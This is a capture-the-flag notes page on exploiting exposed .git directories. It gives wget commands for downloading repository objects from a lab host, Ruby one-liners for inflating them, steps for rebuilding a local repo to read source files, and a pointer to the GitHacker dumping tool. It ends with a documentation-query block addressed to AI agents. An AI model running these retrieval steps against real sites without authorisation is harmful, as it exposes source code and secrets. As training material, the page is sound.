# Git

## Git Information Leak

If the web server leaks the `.git` directory, we can download this directory recursively:

```bash
wget -r http://www.example.com/.git/
```

Show changes between commits, commit and working tree, etc:

```bash
git diff
```

{% hint style="warning" %}
With modern URL mapping (i.e. not relying on the filesystem), it's **less and less common** to see these types of issues, but it's always important to be on the lookout for them.
{% endhint %}

## Bypass Restrictions

If directory listing is disabled, we should examine the following two files first:

* `.git/config`
* `.git/HEAD`

Access `https://www.example.com/.git/config`:

```
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
```

Access `https://www.example.com/.git/HEAD`:

```
ref: refs/heads/master
```

Access `https://www.example.com/.git/refs/heads/master`:

```
5346cb2290d9918bfaad7318ebcb2498fe5ebe18
```

Here `53` is a directory name and `46cb2290d9918bfaad7318ebcb2498fe5ebe18` is a hash. This hash represents a commit and it can found at `.git/objects/53/`. Download this commit:

```shell
wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/53/46cb2290d9918bfaad7318ebcb2498fe5ebe18
```

The file was compressed with zlib, but there isn't a built-in tool for zlib decompression. We can decompress it with Ruby:

```shell
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < 46cb2290d9918bfaad7318ebcb2498fe5ebe18

commit 199tree 58ace0476093d04023f84d7816adacfa7b879c43
author Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000
committer Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000

Initial import
```

From there, we get a new commit that we can download, and from there, check the content by deflating it and running `strings -a` on the result:

```shell
$ wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/58/ace0476093d04023f84d7816adacfa7b879c43
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < ace0476093d04023f84d7816adacfa7b879c43 | strings -a

tree 182
40000 css
100644 favicon.ico
s100644 footer.php
3100644 header.php
100644 index.php
```

We want the hash for each file. Create our own git repo:

```shell
mkdir hack ; cd hack ; git init
```

Copy files to it:

```shell
$ mkdir -p .git/objects/53 .git/objects/58
$ cp ../46cb2290d9918bfaad7318ebcb2498fe5ebe18 .git/objects/53/
$ cp ../ace0476093d04023f84d7816adacfa7b879c43 .git/objects/58/
```

Retrieve hashes:

```shell
$ git cat-file -p 58ace0476093d04023f84d7816adacfa7b879c43

040000 tree b352dde43705f193d2c1d4e6f6a133321186869f	css
100644 blob f303c6a7797f5e7a0d5bd31d39a7149366bbf873	favicon.ico
100644 blob 5adab1a1c52dc009d4f26bbce30dacc4c93eea33	footer.php
100644 blob c3646db7f9c7e6f126c75900fdcce16d50e1da82	header.php
100644 blob 88beb94b5e1fc48e1625c89f892b04bffb58225c	index.php
```

Just to save time, assume that we know the key is inside `header.php`. Create a directory and download this file:

```shell
mkdir .git/objects/c3 && wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82 -O .git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82
```

Examine source code:

```shell
git cat-file -p c3646db7f9c7e6f126c75900fdcce16d50e1da82
```

## GitHacker

[GitHacker](https://github.com/WangYihang/GitHacker) is a multiple threads tool to detect whether a site has the `.git` folder leakage vulnerability. It is able to download the target `.git` folder almost completely. This tool also works when the `DirectoryListings` feature is disabled.

**Installation:** `pip3 install GitHacker`

**Usage:** `githacker --url http://127.0.0.1/.git/ --folder result`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfnote/web/prerequisites/information-gathering/git.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.